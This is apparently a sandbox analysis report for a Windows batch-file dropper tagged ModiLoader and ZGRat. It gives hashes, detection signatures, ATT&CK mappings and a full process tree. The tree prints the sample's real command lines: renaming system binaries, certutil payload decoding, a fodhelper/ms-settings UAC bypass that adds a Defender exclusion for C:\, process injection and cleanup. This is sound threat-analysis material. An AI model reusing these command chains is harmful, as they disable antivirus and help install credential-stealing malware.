modiloader | a092e4a960900082c38c3b96ba17b62efa3d8b7a558ea9964478afa459fcc1a5

Analysis

max time kernel
137s
max time network
116s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
13-05-2024 07:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

doc023561361500.cmd
Size

3.5MB
MD5

dd0e66d9764dda9819678f30922aa6bd
SHA1

cc4937f70fc66f05c3c8d0df868a5bb82222a12c
SHA256

a092e4a960900082c38c3b96ba17b62efa3d8b7a558ea9964478afa459fcc1a5
SHA512

5279fbefb87e776e0c6cacd73610ff0ffada1f6493c01d39b5e44711cc37f1085bfa051f0e2235647f99a183b9c3bf1722dc3a0f760188b3c81b15c6de698206
SSDEEP

49152:uKh6qKOnA/Xl5c25Qnvo9pYPTLBOEKSKhFVq1ZDNBcKKBP78Vp+D6LWg:R

Score

10^/10

modiloader zgrat rat spyware stealer trojan

Malware Config

Signatures

Detect ZGRat V1 33 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4788-82-0x0000000034530000-0x000000003458C000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-84-0x0000000034BD0000-0x0000000034C2A000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-128-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-144-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-142-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-140-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-138-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-136-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-134-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-132-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-130-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-126-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-124-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-122-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-120-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-118-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-116-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-114-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-110-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-108-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-106-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-104-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-102-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-100-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-98-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-96-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-94-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-92-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-88-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-86-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-85-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-112-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1
behavioral1/memory/4788-90-0x0000000034BD0000-0x0000000034C25000-memory.dmp	family_zgrat_v1

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

ModiLoader Second Stage 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4788-77-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2
behavioral1/memory/4788-80-0x0000000000400000-0x0000000001400000-memory.dmp	modiloader_stage2

Executes dropped EXE 26 IoCs

Processes:

alpha.exealpha.exealpha.exealpha.exekn.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exeger.exealpha.exekn.exeper.exealpha.exePing_c.pifalpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exegcggysoG.pif

pid	process
3172	alpha.exe
736	alpha.exe
3512	alpha.exe
2460	alpha.exe
2464	kn.exe
1016	alpha.exe
1036	alpha.exe
4808	alpha.exe
2064	alpha.exe
4464	xkn.exe
1708	alpha.exe
2456	ger.exe
4236	alpha.exe
3276	kn.exe
1944	per.exe
1624	alpha.exe
3672	Ping_c.pif
1428	alpha.exe
3588	alpha.exe
3700	alpha.exe
3944	alpha.exe
4056	alpha.exe
4676	alpha.exe
2896	alpha.exe
2384	alpha.exe
4788	gcggysoG.pif

Reads WinSCP keys stored on the system 2 TTPs
Tries to access WinSCP stored sessions.
spyware stealer

Data from Local System
T1005

Credentials in Registry
T1552.002
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

5 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

Ping_c.pif

description pid process target process

PID 3672 set thread context of 4788 3672 Ping_c.pif gcggysoG.pif

flow	ioc
5	ip-api.com

description	pid	process	target process
PID 3672 set thread context of 4788	3672	Ping_c.pif	gcggysoG.pif

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

2296 taskkill.exe

pid	process
2296	taskkill.exe

Modifies registry class 5 IoCs

Processes:

ger.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\ms-settings\shell\open\command\ = "C:\\\\Users\\\\Public\\\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:\""	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\ms-settings\shell\open\command	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\ms-settings	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\ms-settings\shell	ger.exe
Key created	\REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\ms-settings\shell\open	ger.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

2420 NOTEPAD.EXE

pid	process
2420	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

xkn.exegcggysoG.piftaskmgr.exe

pid	process
4464	xkn.exe
4464	xkn.exe
4788	gcggysoG.pif
4788	gcggysoG.pif
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

xkn.exetaskkill.exegcggysoG.piftaskmgr.exe

description	pid	process
Token: SeDebugPrivilege	4464	xkn.exe
Token: SeDebugPrivilege	2296	taskkill.exe
Token: SeDebugPrivilege	4788	gcggysoG.pif
Token: SeDebugPrivilege	1944	taskmgr.exe
Token: SeSystemProfilePrivilege	1944	taskmgr.exe
Token: SeCreateGlobalPrivilege	1944	taskmgr.exe
Token: 33	1944	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1944	taskmgr.exe

Suspicious use of FindShellTrayWindow 43 IoCs

Processes:

taskmgr.exe

pid	process
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe

Suspicious use of SendNotifyMessage 43 IoCs

Processes:

taskmgr.exe

pid	process
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe
1944	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exealpha.exealpha.exealpha.exexkn.exealpha.exealpha.exealpha.exePing_c.pif

description	pid	process	target process
PID 2764 wrote to memory of 2512	2764	cmd.exe	extrac32.exe
PID 2764 wrote to memory of 2512	2764	cmd.exe	extrac32.exe
PID 2764 wrote to memory of 3172	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3172	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 736	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 736	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3512	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3512	2764	cmd.exe	alpha.exe
PID 3512 wrote to memory of 3204	3512	alpha.exe	extrac32.exe
PID 3512 wrote to memory of 3204	3512	alpha.exe	extrac32.exe
PID 2764 wrote to memory of 2460	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 2460	2764	cmd.exe	alpha.exe
PID 2460 wrote to memory of 2464	2460	alpha.exe	kn.exe
PID 2460 wrote to memory of 2464	2460	alpha.exe	kn.exe
PID 2764 wrote to memory of 1016	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 1016	2764	cmd.exe	alpha.exe
PID 1016 wrote to memory of 3068	1016	alpha.exe	extrac32.exe
PID 1016 wrote to memory of 3068	1016	alpha.exe	extrac32.exe
PID 2764 wrote to memory of 1036	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 1036	2764	cmd.exe	alpha.exe
PID 1036 wrote to memory of 908	1036	alpha.exe	extrac32.exe
PID 1036 wrote to memory of 908	1036	alpha.exe	extrac32.exe
PID 2764 wrote to memory of 4808	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 4808	2764	cmd.exe	alpha.exe
PID 4808 wrote to memory of 1928	4808	alpha.exe	extrac32.exe
PID 4808 wrote to memory of 1928	4808	alpha.exe	extrac32.exe
PID 2764 wrote to memory of 2064	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 2064	2764	cmd.exe	alpha.exe
PID 2064 wrote to memory of 4464	2064	alpha.exe	xkn.exe
PID 2064 wrote to memory of 4464	2064	alpha.exe	xkn.exe
PID 4464 wrote to memory of 1708	4464	xkn.exe	alpha.exe
PID 4464 wrote to memory of 1708	4464	xkn.exe	alpha.exe
PID 1708 wrote to memory of 2456	1708	alpha.exe	ger.exe
PID 1708 wrote to memory of 2456	1708	alpha.exe	ger.exe
PID 2764 wrote to memory of 4236	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 4236	2764	cmd.exe	alpha.exe
PID 4236 wrote to memory of 3276	4236	alpha.exe	kn.exe
PID 4236 wrote to memory of 3276	4236	alpha.exe	kn.exe
PID 2764 wrote to memory of 1944	2764	cmd.exe	per.exe
PID 2764 wrote to memory of 1944	2764	cmd.exe	per.exe
PID 2764 wrote to memory of 1624	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 1624	2764	cmd.exe	alpha.exe
PID 1624 wrote to memory of 2296	1624	alpha.exe	taskkill.exe
PID 1624 wrote to memory of 2296	1624	alpha.exe	taskkill.exe
PID 2764 wrote to memory of 3672	2764	cmd.exe	Ping_c.pif
PID 2764 wrote to memory of 3672	2764	cmd.exe	Ping_c.pif
PID 2764 wrote to memory of 3672	2764	cmd.exe	Ping_c.pif
PID 2764 wrote to memory of 1428	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 1428	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3588	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3588	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3700	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3700	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3944	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 3944	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 4056	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 4056	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 4676	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 4676	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 2896	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 2896	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 2384	2764	cmd.exe	alpha.exe
PID 2764 wrote to memory of 2384	2764	cmd.exe	alpha.exe
PID 3672 wrote to memory of 4788	3672	Ping_c.pif	gcggysoG.pif

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:2764

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
2⤵
PID:2512

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows "
2⤵
- Executes dropped EXE
PID:3172

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:736

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3512

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:3204

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2460

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9
3⤵
- Executes dropped EXE
PID:2464

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1016

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe"
3⤵
PID:3068

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
3⤵
PID:908

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4808

C:\Windows\system32\extrac32.exe
extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
3⤵
PID:1928

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2064

C:\Users\Public\xkn.exe
C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4464

C:\Users\Public\alpha.exe
"C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1708

C:\Users\Public\ger.exe
C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
5⤵
- Executes dropped EXE
- Modifies registry class
PID:2456

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4236

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12
3⤵
- Executes dropped EXE
PID:3276

C:\Windows \System32\per.exe
"C:\\Windows \\System32\\per.exe"
2⤵
- Executes dropped EXE
PID:1944

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1624

C:\Windows\system32\taskkill.exe
taskkill /F /IM SystemSettings.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2296

C:\Users\Public\Libraries\Ping_c.pif
C:\Users\Public\Libraries\Ping_c.pif
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3672

C:\Users\Public\Libraries\gcggysoG.pif
C:\Users\Public\Libraries\gcggysoG.pif
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*"
2⤵
- Executes dropped EXE
PID:1428

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32"
2⤵
- Executes dropped EXE
PID:3588

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c rmdir "C:\Windows \"
2⤵
- Executes dropped EXE
PID:3700

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:3944

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4056

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:4676

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2896

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2384

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:4916

C:\Windows\system32\SystemSettingsAdminFlows.exe
"C:\Windows\system32\SystemSettingsAdminFlows.exe" OptionalFeaturesAdminHelper
1⤵
PID:1616

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1944

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5696

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\doc023561361500.cmd
1⤵
- Opens file in notepad (likely ransom note)
PID:2420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Credentials in Registry

T1552.002

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pfun1uir.ew3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Libraries\Ping_c.pif
Filesize
1.2MB

MD5
7ab12ae02c9531b7ffb6f4fbb24ee11d

SHA1
39eb62487ed993b200a0f015c10833643664b7a0

SHA256
96608d5d3810216c29d3e9ed53a0c004b7787da923f17922bf8af3405b85d90a

SHA512
eef676cc6928653d2b098ddfee4604dab46232fce3a20e32c7a2c505356c02d66b0cf045149bb4dd0e4b132635c639ddc006d482e502714ead7a7b64df3191c9

Download Submit
C:\Users\Public\Libraries\gcggysoG.pif
Filesize
66KB

MD5
c116d3604ceafe7057d77ff27552c215

SHA1
452b14432fb5758b46f2897aeccd89f7c82a727d

SHA256
7bcdc2e607abc65ef93afd009c3048970d9e8d1c2a18fc571562396b13ebb301

SHA512
9202a00eeaf4c5be94de32fd41bfea40fc32d368955d49b7bad2b5c23c4ebc92dccb37d99f5a14e53ad674b63f1baa6efb1feb27225c86693ead3262a26d66c6

Download Submit
C:\Users\Public\Ping_c.mp4
Filesize
2.4MB

MD5
4563cccfc27b4ee87597a7e6e73e7924

SHA1
c5eac5e97193ce539f8b387c906abb7fc9c9488e

SHA256
e0b66384d8a8da0fc7921d7bda9e6ea51abe4477009f82d27d4588c3444baea3

SHA512
080f27b767139105dcc80d038a55b50413a934f4390bdc2f0271acde17b3a1e2eb90dee765de433b067b7deda9752ba5b6ab4470c12eddd4d36534dbb4b5351a

Download Submit
C:\Users\Public\alpha.exe
Filesize
324KB

MD5
c5db7b712f280c3ae4f731ad7d5ea171

SHA1
e8717ff0d40e01fd3b06de2aa5a401bed1c907cc

SHA256
f6c9532e1f4b66be96f0f56bd7c3a3c1997ea8066b91bfcc984e41f072c347ba

SHA512
bceaf7dc30f2c99b40b7025a5eb063f3131a1ef9349fdf356720eaef838bcf58ce3d5e3bad9459ddd2f872df430bdb66a766a5acff5d3bbc738eba8945cb0a89

Download Submit
C:\Users\Public\ger.exe
Filesize
92KB

MD5
cb185e96a887d9389cd136319c1d90e4

SHA1
4779c67e139a6cdc9bcd3bf3ea76dd5d591c48ca

SHA256
ef7d2e4387bc2ff0da05f546a20a159134cb429ecfb1517a655729aed12071eb

SHA512
4dd966a161a89b792568ec17d890a5495399c55ca813d007f63203477a3c8e3b26becfdbc6c676142594e1a8a3af4f69f5d9378ddd07f992e170b78cae59bfdd

Download Submit
C:\Users\Public\kn.exe
Filesize
1.5MB

MD5
3f6129c8d136b6775175a28667ae6c46

SHA1
6e077884cbf7b31e5d7bc6217363fdad967457db

SHA256
43a570f7e49436fa2687b82fb870b31c7af346d66e2622b56c03bfea28b88646

SHA512
2208acea780df21cc4c227d8f7f60973d54679037ffd0f4f67a7412105a5b9d4abf46d425645e922c859d7bdc3b81e7500ae4aa5d9330dc5fcd8618bc3994ff0

Download Submit
C:\Users\Public\xkn.exe
Filesize
440KB

MD5
0e9ccd796e251916133392539572a374

SHA1
eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204

SHA256
c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221

SHA512
e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d

Download Submit
C:\Windows \System32\per.exe
Filesize
100KB

MD5
23d5f6c1a37bfde53049960b7a9564a6

SHA1
f7d00c07c3ae15f3a31240d8423cc054d43d6b48

SHA256
2b5089d56eb0ec9b2854102b5fe984f5be96756a170cc46774021e36b315edc3

SHA512
be8d23ee1619c09e5dc6d60e9d6df777a8d3d525cc7ad42dc75fa9756ea3bc1d8684e73e95944b56c640a91ba34db9feb6a2073f79ef41bb04082b84cabeec43

Download Submit
memory/3672-74-0x0000000000400000-0x0000000000536000-memory.dmp

Filesize
1.2MB

Download
memory/4464-36-0x0000029E47510000-0x0000029E47532000-memory.dmp

Filesize
136KB

Download
memory/4788-130-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-116-0x0000000034BD0000-0x0000000034C25000-memory.dmp

Filesize
340KB

Download
memory/4788-82-0x0000000034530000-0x000000003458C000-memory.dmp
